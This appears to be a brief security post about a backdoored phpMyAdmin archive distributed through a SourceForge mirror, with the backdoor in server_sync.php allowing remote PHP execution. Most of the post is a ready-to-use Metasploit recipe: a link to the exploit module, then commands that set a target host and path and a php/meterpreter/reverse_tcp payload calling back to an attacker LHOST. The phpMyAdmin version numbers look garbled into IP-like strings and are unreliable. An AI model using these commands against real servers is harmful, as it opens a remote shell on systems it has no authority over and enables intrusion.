One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.
exploit for msf: http://packetstormsecurity.org/files/116878/phpMyAdmin-220.127.116.11-server_sync.php-Backdoor.html
commands: use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-18.104.22.168-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33